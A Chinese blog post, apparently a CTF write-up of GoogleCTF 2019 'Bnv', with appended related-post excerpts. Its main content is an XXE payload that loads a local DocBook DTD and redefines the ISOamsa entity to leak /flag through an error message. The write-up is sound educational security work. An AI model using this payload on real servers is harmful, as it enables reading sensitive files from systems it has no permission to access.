[GoogleCTF2019 Quals]Bnv(本地DTD文件与XXE学习)

原创 已于 2022-08-19 01:56:35 修改 · 463 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#buu

于 2022-08-17 16:46:42 首次发布
这篇博客探讨了如何通过XML External Entity (XXE) 漏洞来尝试访问和利用本地DTD文件。作者列举了不同操作系统和特定软件中可能存在的DTD文件路径,并详细介绍了构造XXE payload的步骤,旨在揭示系统敏感信息或获取权限。

在这里插入图片描述
首先看到的就是最上面的那个盲文,不知道啥意思

然后扫了下敏感目录也没什么发现,只注意到这里的 json数据

有 json的地方就有可能有 XXE

试了下就最基本的XXE方法和远程的XXE无回显注入,都不行,看了题解知道的这个方法

---------------利用XXE与本地DTD文件----------------

<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa '
	<!ENTITY &#x25; file SYSTEM "file:///flag">
	<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
	&#x25;eval;
	&#x25;error;
'>
%local_dtd;
]
最低0.47元/天 解锁文章
[GoogleCTF2019 Quals]Bnv -S
nigo134的博客
06-04 613
考点:通过xml的参数实体的路径爆错读取敏感信息知识点1:参考该文章通过枚举文件,找到了不同系统可能本地含有的dtd文件。 例如linux可能存在/usr/share/yelp/dtd/docbookx.dtd 并且该dtd中引用了一个ISOamsa参数实体,因此我们可以定义ISOamsa的内容进行某些攻击。做题:1.开启bp,点击submit抓包。2.发现通过json格式传送message参数,此处尝试使用xml格式传送数据,如果可以的话,就可以考虑使用xxe进行攻击。构造xml: 服务器成功解析,
Google_CTF2019-bnv
qq_25899635的博客
03-01 1004
Web: BNV— 155 point: 这是一个beginner quest,也进一步学习了一下XXE。首先给定一个网站https://bnv.web.ctfcompetition.com/。打开它,是一个盲人网,可以根据他们的城市找到最近的盲人协会。。还有一个提交按钮,可用于搜索最近的盲人协会。 首先使用BurpSiute检查搜索功能的请求和响应: 这个请求将发送带有键“ message”和...
BUU[GoogleCTF2019 Quals]Bnv
qq_62078839的博客
04-19 723
打开连接 发现可以选择City用BP拦截提交后的信息 明显的JSON格式,尝试将格式改为xml,重新构造数据 这里我构造了很多次,都没成功,后来看了网上的wp才知道首先要构造DTD,申明实体,然后申明元素message XML 的特殊字符(&、< 和 >)在 PCDATA 中可以识别,并用于解析元素名称和实体。PCDATA(字符数据)区域被解析器视为数据块,从而允许您在数据流中包含任意字符。 <?xml version="1.0" encoding="u..
[GoogleCTF2019 Quals]Bnv
m0_62805300的博客
04-22 616
抓个包 json格式 将其改为xml格式 添加DTD 尝试请求外部实体 有报错但是回显了内容 尝试加载文件 我们得到一个标记错误。这意味着文件已经正确加载了,但由于它不是个格式良好的xml文件 所以它中断了。 读取flag同样也是 由于我们不被允许加载外部的DTDS,我们怎么加载内部的DTDS呢?有内部的DTDS吗?如果有的话我想我们可以加载它们,所以我们现在需要找到一个内部文件。它是一个可以包含有效XML文件,并且以某种方式获取flag。...
[GoogleCTF2019 Quals]Bnv-XXE学习记录
cjdgg的博客
03-06 1894
[GoogleCTF2019 Quals]Bnv-XXE学习记录 XXE学习知识点XMLDTD内部实体外部实体通用实体参数实体实例做题应用([GoogleCTF2019 Quals]Bnv) 知识点 XML 这里先了解下xml的基本格式 - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - XML 必须正确地嵌套。 - XML 文档必须有根元素。 - XML 的属性值须加引号 看一个例子 <bookstore> <!--根元素--> <book
[ctf web][GoogleCTF2019 Quals]Bnv writeup
ShenZ的博客
02-11 2250
是json格式的,将json改成xml格式能不能打xxe Content-type: application/json Content-type: application/xml 首先构造DTD,申明实体b,申明元素message > 其实之前做得题目都是不用申明元素的,这里如果不申明会报 > No declaration for element message, line 5, column 23 xml <?xml version="1.0" encoding="utf-8
xxe-本地dtd引用(8-17)
Realiy的博客
08-17 573
[GoogleCTF2019 Quals]Bnv 题目发包信息为json,但是如果服务器能够解析xml并且并没有相应的过滤的话,就有可能存在xxe漏洞,具体参见 神奇的Content-Type——在JSON中玩转XXE攻击
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在实际的生产基础结构上运行它们并不安全。 在此处了解有关Google CTF的更多信息: : 请注意,这不是Google的官方产品。
Google Capture The Flag 2019 (Quals) WP
蚁景网安学院
09-07 594
0x00 前言一篇更新的推文0x01 BNV题目描述:There is not much to see in this enterprise-ready™ web application...
Google-CTF-2016-Stego.pcap数据包解析
Aluxian_的博客
10-08 863
在报文段中有 6Bit 的状态控制码, 分别如下tcp。
google ctf 2017 inst_prof writeup
jmp esp
06-23 1278
题目题目本身比较神奇,当时看到这道题的时候还懵了一下,一下子没有太好的思路,不过后两天还有考试所以也没太静下心来想,今天刚考完了再来看这道题感觉其实难度并不是很大。题目给出了一个二进制文件,本能的checksec:[*] '/home/vagrant/ctf/contests/googlectf-2017/inst_prof/inst_prof' Arch: amd64-64-lit
Google CTF GATEKEEPER逆向 //使用ltrace跟踪程序
Ba1_Ma0的博客
06-08 487
需要题目和逆向工具的都可以加我qq:3316735898,有什么不懂的也可以来问我直接运行程序后,它会提醒你输入用户名和密码我们随意输入几个字符串程序提示用户名输入错误 这里我不打算用常规的方法来逆向这个程序,这题我打算使用ltrace工具来跟踪程序的运行这个工具是用来跟踪进程调用库函数的情况 出现了一大堆无用的代码,我们需要筛选一下有用的函数 我们通过重定向到标准错误流到标准输出,然后通过grep筛选出strcmp函数 这个函数会将我们输入的值一个程序里的值做对比,最后输出的是布尔值,如果对比的值一样
googlectf2021_compress
令则
07-19 402
googlectf2021_compress [[toc]] 题目文件: 坚果云, github 逆向分析 程序实现了个数据压缩器, 数据压缩思路是比较常规的计算重复进行压缩, 压缩(.text:0000000000001600 compress_part_0 )和解压(.text:0000000000001840 decompress)算法分别在对应函数内. 大致上格式如下: 54494e59 (magic) 11 (data) // 可选 ff character repetition // 可选
GoogleCTF 2021 CPP write up
qq_42940521的博客
07-19 1139
Google CTF 2021 Reversing CPP 本场比赛过题人数第二多的题目,别问我为啥过题人数最多的Filestore我没解出来,问就是不会写交互脚本导致时间不够 题目描述如下: 感觉题目描述没啥意义,确实用不上 下载后只有一个cpp.c文件 发现里面是宏编程 // Copyright 2021 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not us
Google CTF 2022 Beginner‘s Challenge 漏洞利用全解
最新发布
2402_86373248的博客
06-17 383
经典栈溢出漏洞的现代利用方法多阶段 ROP 链构造技术动态地址计算技巧。
2022 Google CTF SEGFAULT LABYRINTH wp
weixin_45209963的博客
07-04 1029
2022 Google CTF SEGFAULT LABYRINTH wp
DTD 实体 XXE 浅析
hl1293348082的专栏
03-27 651
在 FIT2018 互联网创新大会上得知,最新的 OWASP top10 中,XXE 已上升至第三位,所有对 XXE 产生了强烈的兴趣。虽然之前也听说过 XXE,但是一直未深入了解。经多方资料查询,愈发感受到 XXE 攻击的强大。 以下是我这段时间对 XXE 学习的一点总结,比较浅显,仅供参考。 0x00 什么是 XXE XXE:XML External Entity,即外部实体攻击。要了解 XXE 攻击,需要先了解 XML 相关语法。 XML相关语法 XML 是一种可扩展标记语言,被设计用来传输
探索CTF竞赛的魅力:Google的CTF Scoreboard开源项目
gitblog_00045的博客
06-06 492
探索CTF竞赛的魅力:Google的CTF Scoreboard开源项目 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 在网络安全领域,Capture The Flag(CTF)比赛是一种流行的学习和竞技方式。为了提供一个高效且易于管理的竞赛平台,Google开发了CTF Scoreboard——一个基础的CTF竞赛记分板系统。不仅支持团队竞争,也适用于个人选手,它包...
2023-googleCTF-re-oldshool
qq_54894802的博客
07-30 719
本题叫用给出的用户名,逆向,写出注册机,来批量生成密码,50个用户名,50个密码。刚刚拿到手,还打开不了,一直报错说窗口有问题,后来摸索了好久才知道,需要调整终端大小才能适应。而且这道题也是用Ncurses从零实现了GUI的图形解密,就造成了代码巨多,主函数的代码就接近5000行,还不算其他函数,要准确的找到我们想要的函数是十分的不容易的。这到题如果代码量少一些的话,难度就相对没那么大了。
object::quals
03-20
### 关于 `object::quals` 的含义用法 在 C++ 中,语法结构 `object::quals` 并不是一个标准术语或关键字,但它可能涉及两个主要概念:作用域解析运算符 (`::`) 和限定符 (qualifiers)。 #### 1. **作用域解析运算符 (::)** C++ 使用双冒号 (`::`) 来表示作用域解析操作。它用于访问命名空间中的成员、类内的静态成员函数或变量以及嵌套类的定义[^1]。例如: ```cpp namespace MyNamespace { int value = 42; } int main() { std::cout << MyNamespace::value; // 输出 42 } ``` 上述代码展示了如何通过作用域解析运算符访问命名空间中的变量。 --- #### 2. **限定符 (Qualifiers)** 限定符通常指修饰类型的关键词,比如 `const` 或 `volatile`。当提到 `object::quals` 时,可能是描述对象上的某种限定行为。以下是几种常见场景及其解释: ##### a. 常量限定符 (`const`) 如果某个方法被声明为 `const` 方法,则该方法无法修改其所属的对象状态。这可以通过作用域解析来调用: ```cpp class MyClass { public: void display() const { std::cout << "Constant method"; } }; int main() { MyClass obj; obj.display(); // 调用了常量限定的方法 } ``` 此处,`display()` 是一个带有 `const` 限定符的方法,表明此方法不会改变对象的状态[^2]。 ##### b. 指针限定符 (`const`/`volatile`) 对于指向对象的指针,可以对其应用不同的限定符组合。例如: ```cpp struct Point { int x, y; }; void example(const Point& p) { // 不允许修改传入的对象 // p.x = 10; // 编译错误 } ``` 这里传递给函数的是一个带 `const` 限定符的引用参数,因此不允许对其进行任何更改[^3]。 --- #### 3. 组合理解 `object::quals` 综合来看,“`object::quals`” 可能是指定某特定对象的作用域并附加某些限定条件的操作方式。实际开发中,这种表达形式更多见于讨论而非具体实现细节。下面是一个假设的例子展示两者结合的情况: ```cpp class DatabaseConnection { private: static const char* connection_string; public: static const char* getConnectionString(); }; // 定义静态成员 const char* DatabaseConnection::connection_string = "localhost"; const char* DatabaseConnection::getConnectionString() { return connection_string; } int main() { std::cout << DatabaseConnection::getConnectionString(); // 访问静态成员并通过限定符保护数据 } ``` 在此案例里,`DatabaseConnection::connection_string` 表明这是一个属于类范围内的静态字符串,并且由于加了 `const` 限定符而不可变[^4]。 --- ### 总结 虽然严格意义上不存在名为 `object::quals` 的固定语法规则,但从上下文中推测,这一表述很可能用来概括关于对象范围内属性或者方法所附带的各种限定特性(如只读性)。这些特性的设定有助于增强程序的安全性和逻辑清晰度。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值